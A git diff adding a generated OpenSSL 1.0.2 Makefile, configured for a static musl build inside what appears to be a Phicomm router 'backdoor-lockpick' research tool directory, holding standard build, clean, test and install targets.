diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.bak
new file mode 100644
index 0000000..8b705a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.bak
@@ -0,0 +1,688 @@
+### Generated automatically from Makefile.org by Configure.
+
+##
+## Makefile for OpenSSL
+##
+
+VERSION=1.0.2
+MAJOR=1
+MINOR=0.2
+SHLIB_VERSION_NUMBER=1.0.0
+SHLIB_VERSION_HISTORY=
+SHLIB_MAJOR=1
+SHLIB_MINOR=0.0
+SHLIB_EXT=.so.$(SHLIB_MAJOR).$(SHLIB_MINOR)
+PLATFORM=linux-x86_64-musl
+OPTIONS=enable-rsa enable-md5 --prefix=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt --openssldir=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt no-asm no-comp no-dso no-dtls1 no-ec no-ec_nistp_64_gcc_128 no-ecdh no-ecdsa no-engine no-err no-gmp no-gost no-hw no-idea no-jpake no-krb5 no-libunbound no-md2 no-psk no-rc5 no-rfc3779 no-sctp no-shared no-srp no-ssl-trace no-ssl2 no-ssl3 no-store no-threads no-unit-test no-zlib no-zlib-dynamic static-engine
+CONFIGURE_ARGS=no-shared no-zlib disable-ec enable-rsa enable-md5 no-ssl2 no-ssl3 no-threads no-krb5 no-asm no-hw no-dso no-engine no-dtls1 no-idea no-comp no-err no-psk no-srp linux-x86_64-musl --prefix=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt --openssldir=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt
+SHLIB_TARGET=linux-shared
+
+# HERE indicates where this Makefile lives.  This can be used to indicate
+# where sub-Makefiles are expected to be.  Currently has very limited usage,
+# and should probably not be bothered with at all.
+HERE=.
+
+# INSTALL_PREFIX is for package builders so that they can configure
+# for, say, /usr/ and yet have everything installed to /tmp/somedir/usr/.
+# Normally it is left empty.
+INSTALL_PREFIX=
+INSTALLTOP=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt
+
+# Do not edit this manually. Use Configure --openssldir=DIR do change this!
+OPENSSLDIR=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt
+
+# NO_IDEA - Define to build without the IDEA algorithm
+# NO_RC4  - Define to build without the RC4 algorithm
+# NO_RC2  - Define to build without the RC2 algorithm
+# THREADS - Define when building with threads, you will probably also need any
+#           system defines as well, i.e. _REENTERANT for Solaris 2.[34]
+# TERMIO  - Define the termio terminal subsystem, needed if sgtty is missing.
+# TERMIOS - Define the termios terminal subsystem, Silicon Graphics.
+# LONGCRYPT - Define to use HPUX 10.x's long password modification to crypt(3).
+# DEVRANDOM - Give this the value of the 'random device' if your OS supports
+#           one.  32 bytes will be read from this when the random
+#           number generator is initalised.
+# SSL_FORBID_ENULL - define if you want the server to be not able to use the
+#           NULL encryption ciphers.
+#
+# LOCK_DEBUG - turns on lots of lock debug output :-)
+# REF_CHECK - turn on some xyz_free() assertions.
+# REF_PRINT - prints some stuff on structure free.
+# CRYPTO_MDEBUG - turns on my 'memory leak' detecting stuff
+# MFUNC - Make all Malloc/Free/Realloc calls call
+#       CRYPTO_malloc/CRYPTO_free/CRYPTO_realloc which can be setup to
+#       call application defined callbacks via CRYPTO_set_mem_functions()
+# MD5_ASM needs to be defined to use the x86 assembler for MD5
+# SHA1_ASM needs to be defined to use the x86 assembler for SHA1
+# RMD160_ASM needs to be defined to use the x86 assembler for RIPEMD160
+# Do not define B_ENDIAN or L_ENDIAN if 'unsigned long' == 8.  It must
+# equal 4.
+# PKCS1_CHECK - pkcs1 tests.
+
+CC= musl-gcc
+CFLAG= -DOPENSSL_NO_ERR -m64 -DL_ENDIAN -DTERMIOS -Os -Wall
+DEPFLAG= -DOPENSSL_NO_COMP -DOPENSSL_NO_DTLS1 -DOPENSSL_NO_EC -DOPENSSL_NO_EC_NISTP_64_GCC_128 -DOPENSSL_NO_ECDH -DOPENSSL_NO_ECDSA -DOPENSSL_NO_ENGINE -DOPENSSL_NO_GMP -DOPENSSL_NO_GOST -DOPENSSL_NO_IDEA -DOPENSSL_NO_JPAKE -DOPENSSL_NO_LIBUNBOUND -DOPENSSL_NO_MD2 -DOPENSSL_NO_PSK -DOPENSSL_NO_RC5 -DOPENSSL_NO_RFC3779 -DOPENSSL_NO_SCTP -DOPENSSL_NO_SRP -DOPENSSL_NO_SSL_TRACE -DOPENSSL_NO_SSL2 -DOPENSSL_NO_SSL3 -DOPENSSL_NO_STORE -DOPENSSL_NO_UNIT_TEST
+PEX_LIBS= 
+EX_LIBS= -static
+EXE_EXT= 
+ARFLAGS= 
+AR= ar $(ARFLAGS) r
+RANLIB= /usr/bin/ranlib
+NM= nm
+PERL= /usr/bin/perl
+TAR= tar
+TARFLAGS= --no-recursion
+MAKEDEPPROG=makedepend
+LIBDIR=lib
+
+# We let the C compiler driver to take care of .s files. This is done in
+# order to be excused from maintaining a separate set of architecture
+# dependent assembler flags. E.g. if you throw -mcpu=ultrasparc at SPARC
+# gcc, then the driver will automatically translate it to -xarch=v8plus
+# and pass it down to assembler.
+AS=$(CC) -c
+ASFLAG=$(CFLAG)
+
+# For x86 assembler: Set PROCESSOR to 386 if you want to support
+# the 80386.
+PROCESSOR= 
+
+# CPUID module collects small commonly used assembler snippets
+CPUID_OBJ= mem_clr.o
+BN_ASM= bn_asm.o
+EC_ASM= 
+DES_ENC= des_enc.o fcrypt_b.o
+AES_ENC= aes_core.o aes_cbc.o
+BF_ENC= bf_enc.o
+CAST_ENC= c_enc.o
+RC4_ENC= rc4_enc.o rc4_skey.o
+RC5_ENC= rc5_enc.o
+MD5_ASM_OBJ= 
+SHA1_ASM_OBJ= 
+RMD160_ASM_OBJ= 
+WP_ASM_OBJ= wp_block.o
+CMLL_ENC= camellia.o cmll_misc.o cmll_cbc.o
+MODES_ASM_OBJ= 
+ENGINES_ASM_OBJ= 
+PERLASM_SCHEME= elf
+
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+
+# Zlib stuff
+ZLIB_INCLUDE=
+LIBZLIB=
+
+# TOP level FIPS install directory.
+FIPSDIR=/usr/local/ssl/fips-2.0
+
+# This is the location of fipscanister.o and friends.
+# The FIPS module build will place it $(INSTALLTOP)/lib
+# but since $(INSTALLTOP) can only take the default value
+# when the module is built it will be in /usr/local/ssl/lib
+# $(INSTALLTOP) for this build may be different so hard
+# code the path.
+
+FIPSLIBDIR=
+
+# The location of the library which contains fipscanister.o
+# normally it will be libcrypto unless fipsdso is set in which
+# case it will be libfips. If not compiling in FIPS mode at all
+# this is empty making it a useful test for a FIPS compile.
+
+FIPSCANLIB=
+
+# Shared library base address. Currently only used on Windows.
+#
+
+BASEADDR=0xFB00000
+
+DIRS=   crypto ssl apps test tools
+ENGDIRS= 
+SHLIBDIRS= crypto ssl
+
+# dirs in crypto to build
+SDIRS=  \
+	objects \
+	md4 md5 sha mdc2 hmac ripemd whrlpool \
+	des aes rc2 rc4 bf cast camellia seed modes \
+	bn rsa dsa dh dso \
+	buffer bio stack lhash rand err \
+	evp asn1 pem x509 x509v3 conf txt_db pkcs7 pkcs12 ocsp ui krb5 \
+	cms pqueue ts cmac
+# keep in mind that the above list is adjusted by ./Configure
+# according to no-xxx arguments...
+
+# tests to perform.  "alltests" is a special word indicating that all tests
+# should be performed.
+TESTS = alltests
+
+MAKEFILE= Makefile
+
+MANDIR=$(OPENSSLDIR)/man
+MAN1=1
+MAN3=3
+MANSUFFIX=
+HTMLSUFFIX=html
+HTMLDIR=$(OPENSSLDIR)/html
+SHELL=/bin/sh
+
+TOP=    .
+ONEDIRS=out tmp
+EDIRS=  times doc bugs util include certs ms shlib mt demos perl sf dep VMS
+WDIRS=  windows
+LIBS=   libcrypto.a libssl.a
+SHARED_CRYPTO=libcrypto$(SHLIB_EXT)
+SHARED_SSL=libssl$(SHLIB_EXT)
+SHARED_LIBS=
+SHARED_LIBS_LINK_EXTS=.so.$(SHLIB_MAJOR) .so
+SHARED_LDFLAGS=-m64
+
+GENERAL=        Makefile
+BASENAME=       openssl
+NAME=           $(BASENAME)-$(VERSION)
+TARFILE=        $(NAME).tar
+WTARFILE=       $(NAME)-win.tar
+EXHEADER=       e_os2.h
+HEADER=         e_os.h
+
+all: Makefile build_all openssl.pc libssl.pc libcrypto.pc
+
+# as we stick to -e, CLEARENV ensures that local variables in lower
+# Makefiles remain local and variable. $${VAR+VAR} is tribute to Korn
+# shell, which [annoyingly enough] terminates unset with error if VAR
+# is not present:-( TOP= && unset TOP is tribute to HP-UX /bin/sh,
+# which terminates unset with error if no variable was present:-(
+CLEARENV=	TOP= && unset TOP $${LIB+LIB} $${LIBS+LIBS}	\
+		$${INCLUDE+INCLUDE} $${INCLUDES+INCLUDES}	\
+		$${DIR+DIR} $${DIRS+DIRS} $${SRC+SRC}		\
+		$${LIBSRC+LIBSRC} $${LIBOBJ+LIBOBJ} $${ALL+ALL}	\
+		$${EXHEADER+EXHEADER} $${HEADER+HEADER}		\
+		$${GENERAL+GENERAL} $${CFLAGS+CFLAGS}		\
+		$${ASFLAGS+ASFLAGS} $${AFLAGS+AFLAGS}		\
+		$${LDCMD+LDCMD} $${LDFLAGS+LDFLAGS} $${SCRIPTS+SCRIPTS}	\
+		$${SHAREDCMD+SHAREDCMD} $${SHAREDFLAGS+SHAREDFLAGS}	\
+		$${SHARED_LIB+SHARED_LIB} $${LIBEXTRAS+LIBEXTRAS}
+
+BUILDENV=	PLATFORM='$(PLATFORM)' PROCESSOR='$(PROCESSOR)' \
+		CC='$(CC)' CFLAG='$(CFLAG)' 			\
+		AS='$(CC)' ASFLAG='$(CFLAG) -c'			\
+		AR='$(AR)' NM='$(NM)' RANLIB='$(RANLIB)'	\
+		CROSS_COMPILE='$(CROSS_COMPILE)'	\
+		PERL='$(PERL)' ENGDIRS='$(ENGDIRS)'		\
+		SDIRS='$(SDIRS)' LIBRPATH='$(INSTALLTOP)/$(LIBDIR)'	\
+		INSTALL_PREFIX='$(INSTALL_PREFIX)'		\
+		INSTALLTOP='$(INSTALLTOP)' OPENSSLDIR='$(OPENSSLDIR)'	\
+		LIBDIR='$(LIBDIR)'				\
+		MAKEDEPEND='$$$${TOP}/util/domd $$$${TOP} -MD $(MAKEDEPPROG)' \
+		DEPFLAG='-DOPENSSL_NO_DEPRECATED $(DEPFLAG)'	\
+		MAKEDEPPROG='$(MAKEDEPPROG)'			\
+		SHARED_LDFLAGS='$(SHARED_LDFLAGS)'		\
+		KRB5_INCLUDES='$(KRB5_INCLUDES)' LIBKRB5='$(LIBKRB5)'	\
+		ZLIB_INCLUDE='$(ZLIB_INCLUDE)' LIBZLIB='$(LIBZLIB)'	\
+		EXE_EXT='$(EXE_EXT)' SHARED_LIBS='$(SHARED_LIBS)'	\
+		SHLIB_EXT='$(SHLIB_EXT)' SHLIB_TARGET='$(SHLIB_TARGET)'	\
+		PEX_LIBS='$(PEX_LIBS)' EX_LIBS='$(EX_LIBS)'	\
+		CPUID_OBJ='$(CPUID_OBJ)' BN_ASM='$(BN_ASM)'	\
+		EC_ASM='$(EC_ASM)' DES_ENC='$(DES_ENC)' 	\
+		AES_ENC='$(AES_ENC)' CMLL_ENC='$(CMLL_ENC)'	\
+		BF_ENC='$(BF_ENC)' CAST_ENC='$(CAST_ENC)'	\
+		RC4_ENC='$(RC4_ENC)' RC5_ENC='$(RC5_ENC)'	\
+		SHA1_ASM_OBJ='$(SHA1_ASM_OBJ)'			\
+		MD5_ASM_OBJ='$(MD5_ASM_OBJ)'			\
+		RMD160_ASM_OBJ='$(RMD160_ASM_OBJ)'		\
+		WP_ASM_OBJ='$(WP_ASM_OBJ)'			\
+		MODES_ASM_OBJ='$(MODES_ASM_OBJ)'		\
+		ENGINES_ASM_OBJ='$(ENGINES_ASM_OBJ)'		\
+		PERLASM_SCHEME='$(PERLASM_SCHEME)'		\
+		FIPSLIBDIR='${FIPSLIBDIR}'			\
+		FIPSDIR='${FIPSDIR}'				\
+		FIPSCANLIB="$${FIPSCANLIB:-$(FIPSCANLIB)}"	\
+		THIS=$${THIS:-$@} MAKEFILE=Makefile MAKEOVERRIDES=
+# MAKEOVERRIDES= effectively "equalizes" GNU-ish and SysV-ish make flavors,
+# which in turn eliminates ambiguities in variable treatment with -e.
+
+# BUILD_CMD is a generic macro to build a given target in a given
+# subdirectory.  The target must be given through the shell variable
+# `target' and the subdirectory to build in must be given through `dir'.
+# This macro shouldn't be used directly, use RECURSIVE_BUILD_CMD or
+# BUILD_ONE_CMD instead.
+#
+# BUILD_ONE_CMD is a macro to build a given target in a given
+# subdirectory if that subdirectory is part of $(DIRS).  It requires
+# exactly the same shell variables as BUILD_CMD.
+#
+# RECURSIVE_BUILD_CMD is a macro to build a given target in all
+# subdirectories defined in $(DIRS).  It requires that the target
+# is given through the shell variable `target'.
+BUILD_CMD=  if [ -d "$$dir" ]; then \
+	    (	cd $$dir && echo "making $$target in $$dir..." && \
+		$(CLEARENV) && $(MAKE) -e $(BUILDENV) TOP=.. DIR=$$dir $$target \
+	    ) || exit 1; \
+	    fi
+RECURSIVE_BUILD_CMD=for dir in $(DIRS); do $(BUILD_CMD); done
+BUILD_ONE_CMD=\
+	if expr " $(DIRS) " : ".* $$dir " >/dev/null 2>&1; then \
+		$(BUILD_CMD); \
+	fi
+
+reflect:
+	@[ -n "$(THIS)" ] && $(CLEARENV) && $(MAKE) $(THIS) -e $(BUILDENV)
+
+sub_all: build_all
+build_all: build_libs build_apps build_tests build_tools
+
+build_libs: build_crypto build_ssl build_engines
+
+build_crypto:
+	@dir=crypto; target=all; $(BUILD_ONE_CMD)
+build_ssl:
+	@dir=ssl; target=all; $(BUILD_ONE_CMD)
+build_engines:
+	@dir=engines; target=all; $(BUILD_ONE_CMD)
+build_apps:
+	@dir=apps; target=all; $(BUILD_ONE_CMD)
+build_tests:
+	@dir=test; target=all; $(BUILD_ONE_CMD)
+build_tools:
+	@dir=tools; target=all; $(BUILD_ONE_CMD)
+
+all_testapps: build_libs build_testapps
+build_testapps:
+	@dir=crypto; target=testapps; $(BUILD_ONE_CMD)
+
+fips_premain_dso$(EXE_EXT): libcrypto.a
+	[ -z "$(FIPSCANLIB)" ] || $(CC) $(CFLAG) -Iinclude \
+		-DFINGERPRINT_PREMAIN_DSO_LOAD -o $@  \
+		$(FIPSLIBDIR)fips_premain.c $(FIPSLIBDIR)fipscanister.o \
+		libcrypto.a $(EX_LIBS)
+
+libcrypto$(SHLIB_EXT): libcrypto.a fips_premain_dso$(EXE_EXT)
+	@if [ "$(SHLIB_TARGET)" != "" ]; then \
+		if [ "$(FIPSCANLIB)" = "libcrypto" ]; then \
+			FIPSLD_LIBCRYPTO=libcrypto.a ; \
+			FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; \
+			export CC FIPSLD_CC FIPSLD_LIBCRYPTO; \
+		fi; \
+		$(MAKE) -e SHLIBDIRS=crypto  CC="$${CC:-$(CC)}" build-shared && \
+		(touch -c fips_premain_dso$(EXE_EXT) || :); \
+	else \
+		echo "There's no support for shared libraries on this platform" >&2; \
+		exit 1; \
+	fi
+
+libssl$(SHLIB_EXT): libcrypto$(SHLIB_EXT) libssl.a
+	@if [ "$(SHLIB_TARGET)" != "" ]; then \
+		$(MAKE) SHLIBDIRS=ssl SHLIBDEPS='-lcrypto' build-shared; \
+	else \
+		echo "There's no support for shared libraries on this platform" >&2; \
+		exit 1; \
+	fi
+
+clean-shared:
+	@set -e; for i in $(SHLIBDIRS); do \
+		if [ -n "$(SHARED_LIBS_LINK_EXTS)" ]; then \
+			tmp="$(SHARED_LIBS_LINK_EXTS)"; \
+			for j in $${tmp:-x}; do \
+				( set -x; rm -f lib$$i$$j ); \
+			done; \
+		fi; \
+		( set -x; rm -f lib$$i$(SHLIB_EXT) ); \
+		if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+			( set -x; rm -f cyg$$i$(SHLIB_EXT) lib$$i$(SHLIB_EXT).a ); \
+		fi; \
+	done
+
+link-shared:
+	@ set -e; for i in $(SHLIBDIRS); do \
+		$(MAKE) -f $(HERE)/Makefile.shared -e $(BUILDENV) \
+			LIBNAME=$$i LIBVERSION=$(SHLIB_MAJOR).$(SHLIB_MINOR) \
+			LIBCOMPATVERSIONS=";$(SHLIB_VERSION_HISTORY)" \
+			symlink.$(SHLIB_TARGET); \
+		libs="$$libs -l$$i"; \
+	done
+
+build-shared: do_$(SHLIB_TARGET) link-shared
+
+do_$(SHLIB_TARGET):
+	@ set -e; libs='-L. $(SHLIBDEPS)'; for i in $(SHLIBDIRS); do \
+		if [ "$$i" = "ssl" -a -n "$(LIBKRB5)" ]; then \
+			libs="$(LIBKRB5) $$libs"; \
+		fi; \
+		$(CLEARENV) && $(MAKE) -f Makefile.shared -e $(BUILDENV) \
+			LIBNAME=$$i LIBVERSION=$(SHLIB_MAJOR).$(SHLIB_MINOR) \
+			LIBCOMPATVERSIONS=";$(SHLIB_VERSION_HISTORY)" \
+			LIBDEPS="$$libs $(EX_LIBS)" \
+			link_a.$(SHLIB_TARGET); \
+		libs="-l$$i $$libs"; \
+	done
+
+libcrypto.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL-libcrypto'; \
+	    echo 'Description: OpenSSL cryptography library'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires: '; \
+	    echo 'Libs: -L$${libdir} -lcrypto'; \
+	    echo 'Libs.private: $(EX_LIBS)'; \
+	    echo 'Cflags: -I$${includedir} $(KRB5_INCLUDES)' ) > libcrypto.pc
+
+libssl.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL-libssl'; \
+	    echo 'Description: Secure Sockets Layer and cryptography libraries'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires.private: libcrypto'; \
+	    echo 'Libs: -L$${libdir} -lssl'; \
+	    echo 'Libs.private: $(EX_LIBS)'; \
+	    echo 'Cflags: -I$${includedir} $(KRB5_INCLUDES)' ) > libssl.pc
+
+openssl.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL'; \
+	    echo 'Description: Secure Sockets Layer and cryptography libraries and tools'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires: libssl libcrypto' ) > openssl.pc
+
+Makefile: Makefile.org Configure config
+	@echo "Makefile is older than Makefile.org, Configure or config."
+	@echo "Reconfigure the source tree (via './config' or 'perl Configure'), please."
+	@false
+
+libclean:
+	rm -f *.map *.so *.so.* *.dylib *.dll engines/*.so engines/*.dll engines/*.dylib *.a engines/*.a */lib */*/lib
+
+clean:	libclean
+	rm -f shlib/*.o *.o core a.out fluff rehash.time testlog make.log cctest cctest.c
+	@set -e; target=clean; $(RECURSIVE_BUILD_CMD)
+	rm -f $(LIBS)
+	rm -f openssl.pc libssl.pc libcrypto.pc
+	rm -f speed.* .pure
+	rm -f $(TARFILE)
+	@set -e; for i in $(ONEDIRS) ;\
+	do \
+	rm -fr $$i/*; \
+	done
+
+makefile.one: files
+	$(PERL) util/mk1mf.pl >makefile.one; \
+	sh util/do_ms.sh
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile > $(TOP)/MINFO
+	@set -e; target=files; $(RECURSIVE_BUILD_CMD)
+
+links:
+	@$(PERL) $(TOP)/util/mkdir-p.pl include/openssl
+	@$(PERL) $(TOP)/util/mklink.pl include/openssl $(EXHEADER)
+	@set -e; target=links; $(RECURSIVE_BUILD_CMD)
+
+gentests:
+	@(cd test && echo "generating dummy tests (if needed)..." && \
+	$(CLEARENV) && $(MAKE) -e $(BUILDENV) TESTS='$(TESTS)' OPENSSL_DEBUG_MEMORY=on generate );
+
+dclean:
+	rm -rf *.bak include/openssl certs/.0
+	@set -e; target=dclean; $(RECURSIVE_BUILD_CMD)
+
+rehash: rehash.time
+rehash.time: certs apps
+	@if [ -z "$(CROSS_COMPILE)" ]; then \
+		(OPENSSL="`pwd`/util/opensslwrap.sh"; \
+		[ -x "apps/openssl.exe" ] && OPENSSL="apps/openssl.exe" || :; \
+		OPENSSL_DEBUG_MEMORY=on; \
+		export OPENSSL OPENSSL_DEBUG_MEMORY; \
+		$(PERL) tools/c_rehash certs/demo) && \
+		touch rehash.time; \
+	else :; fi
+
+test:   tests
+
+tests: rehash
+	@(cd test && echo "testing..." && \
+	$(CLEARENV) && $(MAKE) -e $(BUILDENV) TOP=.. TESTS='$(TESTS)' OPENSSL_DEBUG_MEMORY=on OPENSSL_CONF=../apps/openssl.cnf tests );
+	OPENSSL_CONF=apps/openssl.cnf util/opensslwrap.sh version -a
+
+report:
+	@$(PERL) util/selftest.pl
+
+depend:
+	@set -e; target=depend; $(RECURSIVE_BUILD_CMD)
+
+lint:
+	@set -e; target=lint; $(RECURSIVE_BUILD_CMD)
+
+tags:
+	rm -f TAGS
+	find . -name '[^.]*.[ch]' | xargs etags -a
+
+errors:
+	$(PERL) util/ck_errf.pl -strict */*.c */*/*.c
+	$(PERL) util/mkerr.pl -recurse -write
+	(cd engines; $(MAKE) PERL=$(PERL) errors)
+
+stacks:
+	$(PERL) util/mkstack.pl -write
+
+util/libeay.num::
+	$(PERL) util/mkdef.pl crypto update
+
+util/ssleay.num::
+	$(PERL) util/mkdef.pl ssl update
+
+crypto/objects/obj_dat.h: crypto/objects/obj_dat.pl crypto/objects/obj_mac.h
+	$(PERL) crypto/objects/obj_dat.pl crypto/objects/obj_mac.h crypto/objects/obj_dat.h
+crypto/objects/obj_mac.h: crypto/objects/objects.pl crypto/objects/objects.txt crypto/objects/obj_mac.num
+	$(PERL) crypto/objects/objects.pl crypto/objects/objects.txt crypto/objects/obj_mac.num crypto/objects/obj_mac.h
+crypto/objects/obj_xref.h: crypto/objects/objxref.pl crypto/objects/obj_xref.txt crypto/objects/obj_mac.num
+	$(PERL) crypto/objects/objxref.pl crypto/objects/obj_mac.num crypto/objects/obj_xref.txt >crypto/objects/obj_xref.h
+
+apps/openssl-vms.cnf: apps/openssl.cnf
+	$(PERL) VMS/VMSify-conf.pl < apps/openssl.cnf > apps/openssl-vms.cnf
+
+crypto/bn/bn_prime.h: crypto/bn/bn_prime.pl
+	$(PERL) crypto/bn/bn_prime.pl >crypto/bn/bn_prime.h
+
+
+TABLE: Configure
+	(echo 'Output of `Configure TABLE'"':"; \
+	$(PERL) Configure TABLE) > TABLE
+
+update: errors stacks util/libeay.num util/ssleay.num crypto/objects/obj_dat.h crypto/objects/obj_xref.h apps/openssl-vms.cnf crypto/bn/bn_prime.h TABLE depend
+
+# Build distribution tar-file. As the list of files returned by "find" is
+# pretty long, on several platforms a "too many arguments" error or similar
+# would occur. Therefore the list of files is temporarily stored into a file
+# and read directly, requiring GNU-Tar. Call "make TAR=gtar dist" if the normal
+# tar does not support the --files-from option.
+tar:
+	find . -type d -print | xargs chmod 755
+	find . -type f -print | xargs chmod a+r
+	find . -type f -perm -0100 -print | xargs chmod a+x
+	find * \! -path CVS/\* \! -path \*/CVS/\* \! -name CVS \! -name .cvsignore \! -name STATUS \! -name TABLE | sort > ../$(TARFILE).list; \
+	$(TAR) $(TARFLAGS) --files-from ../$(TARFILE).list -cvf - | \
+	tardy --user_number=0  --user_name=openssl \
+	      --group_number=0 --group_name=openssl \
+	      --prefix=openssl-$(VERSION) - |\
+	gzip --best >../$(TARFILE).gz; \
+	rm -f ../$(TARFILE).list; \
+	ls -l ../$(TARFILE).gz
+
+tar-snap:
+	@$(TAR) $(TARFLAGS) -cvf - \
+		`find * \! -path CVS/\* \! -path \*/CVS/\* \! -name CVS \! -name .cvsignore \! -name STATUS \! -name TABLE \! -name '*.o' \! -name '*.a' \! -name '*.so' \! -name '*.so.*'  \! -name 'openssl' \! -name '*test' \! -name '.#*' \! -name '*~' | sort` |\
+	tardy --user_number=0  --user_name=openssl \
+	      --group_number=0 --group_name=openssl \
+	      --prefix=openssl-$(VERSION) - > ../$(TARFILE);\
+	ls -l ../$(TARFILE)
+
+dist:   
+	$(PERL) Configure dist
+	@$(MAKE) dist_pem_h
+	@$(MAKE) SDIRS='$(SDIRS)' clean
+	@$(MAKE) TAR='$(TAR)' TARFLAGS='$(TARFLAGS)' tar
+
+dist_pem_h:
+	(cd crypto/pem; $(MAKE) -e $(BUILDENV) pem.h; $(MAKE) clean)
+
+install: all install_docs install_sw
+
+install_sw:
+	@$(PERL) $(TOP)/util/mkdir-p.pl $(INSTALL_PREFIX)$(INSTALLTOP)/bin \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR) \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/misc \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/certs \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/private
+	@set -e; headerlist="$(EXHEADER)"; for i in $$headerlist;\
+	do \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+	@set -e; target=install; $(RECURSIVE_BUILD_CMD)
+	@set -e; liblist="$(LIBS)"; for i in $$liblist ;\
+	do \
+		if [ -f "$$i" ]; then \
+		(       echo installing $$i; \
+			cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			$(RANLIB) $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i ); \
+		fi; \
+	done;
+	@set -e; if [ -n "$(SHARED_LIBS)" ]; then \
+		tmp="$(SHARED_LIBS)"; \
+		for i in $${tmp:-x}; \
+		do \
+			if [ -f "$$i" -o -f "$$i.a" ]; then \
+			(       echo installing $$i; \
+				if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+					c=`echo $$i | sed 's/^lib\(.*\)\.dll\.a/cyg\1-$(SHLIB_VERSION_NUMBER).dll/'`; \
+					cp $$c $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new; \
+					chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c; \
+					cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i; \
+				else \
+					cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					chmod 555 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i; \
+				fi ); \
+				if expr $(PLATFORM) : 'mingw' > /dev/null; then \
+				(	case $$i in \
+						*crypto*) i=libeay32.dll;; \
+						*ssl*)    i=ssleay32.dll;; \
+					esac; \
+					echo installing $$i; \
+	 				cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 				chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 				mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i ); \
+				fi; \
+			fi; \
+		done; \
+		(	here="`pwd`"; \
+			cd $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR); \
+			$(MAKE) -f $$here/Makefile HERE="$$here" link-shared ); \
+		if [ "$(INSTALLTOP)" != "/usr" ]; then \
+			echo 'OpenSSL shared libraries have been installed in:'; \
+			echo '  $(INSTALLTOP)'; \
+			echo ''; \
+			sed -e '1,/^$$/d' doc/openssl-shared.txt; \
+		fi; \
+	fi
+	cp libcrypto.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/libcrypto.pc
+	cp libssl.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
